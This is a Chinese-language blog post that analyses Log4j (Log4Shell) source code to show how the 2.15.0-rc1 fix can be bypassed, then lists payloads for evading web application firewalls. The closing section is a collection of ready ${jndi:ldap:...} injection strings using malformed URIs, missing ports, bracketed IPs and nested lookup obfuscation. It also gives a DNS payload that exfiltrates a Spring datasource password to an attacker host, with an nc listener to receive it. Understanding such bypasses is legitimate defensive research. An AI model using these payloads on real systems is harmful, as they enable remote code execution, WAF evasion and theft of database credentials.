0 前言
log4j漏洞的形成原因已經有很多分析文章了,在看到2.15.0-rc1版本存在繞過的消息后,馬上到log4j的github看了一些,發現了可能的繞過思路,順帶還搞了一些繞waf的tips
1 log4j 2.15.0-rc1繞過
1.1 如何發現漏洞產生原因的
了解到log4j <=2.14.1 存在RCE的情況,我馬上跑到其官方github看了一下,發現commit記錄中有兩個關鍵commit
- 第一,log4j不再自動對消息中的lookup進行格式化,第一時間看到不是很懂
- 第二,限制JNDI默認支持,限制通過LDAP訪問服務器和類
這兩個點很容易聯想到是不是跟JNDI攻擊有關系,畢竟RMI和LDAP很容易做到RCE。跟進commit看看具體的修改情況,https://github.com/apache/logging-log4j2/commit/d82b47c6fae9c15fcb183170394d5f1a01ac02d3 這個commit中,對org.apache.logging.log4j.core.net.JndiManager.java進行了大量修改,特別是在lookup方法中,加了很多代碼
仔細看了一下,沒有修改前,lookup方法直接通過this.context.lookup(name)執行JNDI操作,沒有任何過濾或者限制,而新增加的代碼在限制JNDI服務器、類。那很明顯了,看到payload后,馬上對log4j 2.14.1版本嘗試了一下,並在JndiManager#lookup中斷點看到如下
很明顯,name就是payload中給定的,仔細看一下調用棧就可以發現,log4j會對字符串中的${}自動解析,也就是前面提到的commit備注信息中寫到的。利用${}解析還能繼續做一些文章繞過waf,需要了解log4j關於字符解析的方法,就不展開了:)
1.2 如何繞過2.15.0-rc1版本
首先來看看官方github倉庫的commit記錄,里面有一條在更新到2.15.0-rc1版本后的commit記錄,提交的信息是"handle URI exception",即處理了URI出錯的情況。修改代碼情況如下圖
以為着在JndiManager#lookup方法處給catch語句中添加了兩行代碼,記錄JNDI URI錯誤並返回null。而添加這兩行代碼前,此處只有一行注釋,因此會繼續向下執行this.context.lookup,也就意味着前面try語句中的代碼報錯后,會繼續執行JNDI操作,繞過也就來自於這里。
來看看try語句是什么寫的
代碼比較長沒有完全截進來,關鍵點是進入lookup方法后,立即將name變量送入URI類的構造函數中,此時只要URI的構造函數對name字符串解析出錯,即可跳轉到catch語句,進而向下執行到JNDI操作。
那么我們要關注的點就是讓new URI(name)處報錯,但是name又能被jndi正常識別。好在我們用marshalsec構造ldap服務時,不需要關心uri長什么樣,所以可以在uri上做文章。
跟蹤源代碼可以查看到URI對字符的支持情況
數字、字母大小寫這些就不說了,其它可打印字符也不多,從上面的注釋中可以看到URI對反引號`,空格,尖括號<>並不支持,基於這一點,我們可以做個簡單的實驗
空格和尖括號同樣報錯,就不重復截圖了。回到前面提到的2.15.0-rc1版本對JndiManager#lookup方法的修復情況,並沒有在catch語句中添加返回操作或報錯,程序遇到報錯后,會繼續向下執行,從而造成危險。
由於自己比較菜雞,找了很久都沒有找到log4j-core-2.15.0-rc1.jar這個包,所以自己寫了個函數模擬一下繞過的場景
需要注意的是,2.15.0-rc1版本已經默認關閉了lookup自動格式化也就是解析${},但是可以手動開啟,這些內容就不贅述了。
2 LDAP繞WAF的tips
2.1 URI解析
關於${}繞jndi:ldap這些關鍵字的方法非原創就不詳細展開了,來說說ldap地址解析過程中發現的case。
跟着context.lookup向下跟進到com.sun.jndi.url.ldap.LdapURLContextFactory#getUsingURLIgnoreRootDN方法,代碼如下
注意var0也就是輸入是完整的"ldap://192.168.34.96:1389:/a",而后var2可以使用getHost和getPort方法獲取host和port,說明var2對象在創建時解析了ldap地址。跟進LdapURL類到達Uri#parse方法
- com.sun.jndi.toolkit.url.Uri#parse
private void parse(String var1) throws MalformedURLException {
int var2 = var1.indexOf(58);
if (var2 < 0) {
throw new MalformedURLException("Invalid URI: " + var1);
} else {
this.scheme = var1.substring(0, var2);
++var2;
this.hasAuthority = var1.startsWith("//", var2);
int var3;
if (this.hasAuthority) {
var2 += 2;
var3 = var1.indexOf(47, var2);
if (var3 < 0) {
var3 = var1.length();
}
int var4;
if (var1.startsWith("[", var2)) {
var4 = var1.indexOf(93, var2 + 1);
if (var4 < 0 || var4 > var3) {
throw new MalformedURLException("Invalid URI: " + var1);
}
this.host = var1.substring(var2, var4 + 1);
var2 = var4 + 1;
} else {
var4 = var1.indexOf(58, var2);
int var5 = var4 >= 0 && var4 <= var3 ? var4 : var3;
if (var2 < var5) {
this.host = var1.substring(var2, var5);
}
var2 = var5;
}
if (var2 + 1 < var3 && var1.startsWith(":", var2)) {
++var2;
this.port = Integer.parseInt(var1.substring(var2, var3));
}
var2 = var3;
}
var3 = var1.indexOf(63, var2);
if (var3 < 0) {
this.path = var1.substring(var2);
} else {
this.path = var1.substring(var2, var3);
this.query = var1.substring(var3);
}
}
}
此時var1="ldap://192.168.34.96:1389/a"
-
var2第一次賦值為(char)58也就是 : 在ldap中的索引,如果不存在 : 則直接報錯
-
this.scheme賦值為第1個字符到 : 之間的字符串,也就是ldap、ldaps
-
var2第二次賦值自加1,而后檢查冒號后是否存在//,如果不存在,則host和port都直接為null,進入path和query解析部分,也就是路徑和參數
-
第一個冒號后存在//,則進入if語句,var2第三次賦值,再加2,也就是跳過了//繼續向后判斷
-
(char)47 也就是/,給var3=var1.indexOf("/", var2),實際上為://后第一個/的索引,這是用來找到host和port的一個定位,但很有可能后面沒有/(即var1="ldap://192.168.1.1:1389",此時var3直接賦值為var1.length,也就是var1最大索引+1)
-
再往下走,會先判斷://和var3直接有沒有 [ 和 ] 符號對,且 ] 不能在var3后面否則會直接報錯,這里有個意外情況就是ldap://[localhost:1389]/a這樣寫的話,會將localhost:1389當成host
-
如果沒有出現[]符號對,則賦值var4為://后的第一個:的索引,然后判斷var4>=0 且 var4<=var3,也就是:必須存在且在var3的前面,條件達成則賦值為var5=var4,否則var5=var3,即從://和:之間獲取host,或者從://和/之間獲取host。此時出現騷操作"ldap://localhost/:",則host=localhost,騷操作"ldap://localhost",則host=null
-
繼續往后走,如果正常在://和var3之間出現冒號,則可以截取出port,如果前面的騷操作"ldap://localhost/:",則port為默認值-1,這個-1在后面大有可為:)
后面解析path和query的部分就不看了,回到com.sun.jndi.url.ldap.LdapURLContextFactory#getUsingURLIgnoreRootDN也就是上面那個圖片的位置,此時host和port都解析好了,正式開啟發起ldap請求
2.2 LDAP發起
com.sun.jndi.url.ldap.LdapURLContextFactory#getUsingURLIgnoreRootDN,執行到new LdapCtx("", var2.getHost(), var2.getPort(), var1, var2.useSsl()),即此時LdapURL已經解析完成,host和port都有了,跟進LdapCtx的構造方法,代碼如下
public LdapCtx(String var1, String var2, int var3, Hashtable<?, ?> var4, boolean var5) throws NamingException {
this.useSsl = this.hasLdapsScheme = var5;
if (var4 != null) {
this.envprops = (Hashtable)var4.clone();
if ("ssl".equals(this.envprops.get("java.naming.security.protocol"))) {
this.useSsl = true;
}
this.trace = (OutputStream)this.envprops.get("com.sun.jndi.ldap.trace.ber");
if (var4.get("com.sun.jndi.ldap.netscape.schemaBugs") != null || var4.get("com.sun.naming.netscape.schemaBugs") != null) {
this.netscapeSchemaBug = true;
}
}
this.currentDN = var1 != null ? var1 : "";
this.currentParsedDN = parser.parse(this.currentDN);
this.hostname = var2 != null && var2.length() > 0 ? var2 : "localhost";
if (this.hostname.charAt(0) == '[') {
this.hostname = this.hostname.substring(1, this.hostname.length() - 1);
}
if (var3 > 0) {
this.port_number = var3;
} else {
this.port_number = this.useSsl ? 636 : 389;
this.useDefaultPortNumber = true;
}
this.schemaTrees = new Hashtable(11, 0.75F);
this.initEnv();
try {
this.connect(false);
} catch (NamingException var9) {
try {
this.close();
} catch (Exception var8) {
}
throw var9;
}
}
這里主要關注hostname和port_number兩個參數,即下面的代碼塊
this.hostname = var2 != null && var2.length() > 0 ? var2 : "localhost";
if (this.hostname.charAt(0) == '[') {
this.hostname = this.hostname.substring(1, this.hostname.length() - 1);
}
if (var3 > 0) {
this.port_number = var3;
} else {
this.port_number = this.useSsl ? 636 : 389;
this.useDefaultPortNumber = true;
}
其中var2=LdapURL中解析的host,var3=LdapURL中解析的port
-
注意到代碼邏輯,如果var2為null,則直接使this.hostname="localhost";
-
如果hostname的第一個字符為"[",則取出第二個字符至倒數第二個字符的子字符串
-
如果var3<=0,即LdapURL解析port失敗,則在使用ldaps時,端口改為636,使用ldap時,端口強制改為389
這些邏輯是變換ldap字符串的關鍵
2.3 Bypass WAF tips
根據前面LdapURL和LdapCtx的解析邏輯,可以對log4j的payload做出如下變換
- 繞過2.15.0-rc1
在uri中增加反引號` 或 空格 或 尖括號
${jndi:ldap:192.168.1.1:1389/ a}
${jndi:ldap:192.168.1.1:1389/a`}
${jndi:ldap:192.168.1.1:1389/<a}
- ldap部分不出現port,避免被waf匹配ip:port
${jndi:ldap:192.168.1.1/a}
${jndi:ldap:192.168.1.1:/a}
注意此時需要ldap服務端口為389
- 對IP添加包裹
前面兩個類的解析邏輯中都有對中括號[]的處理,所以給ip添加一下包裹
${jndi:ldap://[192.168.34.96]/a}
${jndi:ldap://[192.168.34.96]]/a}
LdapURL取出"[ip]",LdapCtx去除[]獲得ip,兩種情況下端口都是389
- 不出現ip和端口(有點雞肋)
${jndi:ldap:/a}
另外由於ldap協議本身的原因,必須要有一個path,所以至少寫為ldap:/a,使得Ldap.path=a,否則不會下載惡意class文件
這種情況主要是來自於LdapURL解析URL時出錯,導致host=null,port=-1,而后LdapCtx中發現host=null,則將host置為localhost,畢竟這樣做看起來是可信的
原理是,LdapURL解析時有個關鍵處理如下
this.hasAuthority = var1.startsWith("//", var2); // var2=第一個冒號的索引
if (hasAuthority){
解析獲取host和port
}
此時不出現://這個整體,就可以直接跳出host和port的獲取,而后在LdapCtx中對host=null時,賦值為localhost,對port=默認值-1時,賦值為389
這個payload需要在目標上執行命令或其它方式開啟ldap和文件下載服務,但都可以在目標上執行命令了,還需要這樣干嗎?所以有點雞肋,除非java程序的權限比可以執行命令的用戶權限更高,從而拿到更高權限(不過提權姿勢也很多啊)
- 字符解析
${jnd${:-i}:ladp:xx}
${jnd${::-i}:ladp:xx}
${jnd${E:-i}:ladp:xx}
${jnd${fafasdf234:-i}:ladp:xx} //:-i前可以替換成任意字符
- lower和upper
${lower:J} = j
${upper:j} = J
${${lower:J}ndi:ldap:xx}
${${upper:j}ndi:ldap:xx}
另外還有特殊字符 ı(\u0131),通過upper操作,可以使其變成i
${jnd${upper:ı}:ldap:xxx}
- 利用unicode
unicode編碼在java中可以直接被解碼成字符處理,但一般waf都具有unicode預解碼能力
- Bundle外帶
方法來自淺藍師傅博客https://b1ue.cn/archives/513.html ,log4j中可以使用Bundle獲取特殊變量值,通過dns外帶,spring環境下可以嘗試獲取
${jndi:dns://ip:53/${bundle:application:spring.datasource.password}}
nc -lvvp 53 開個端口等待即可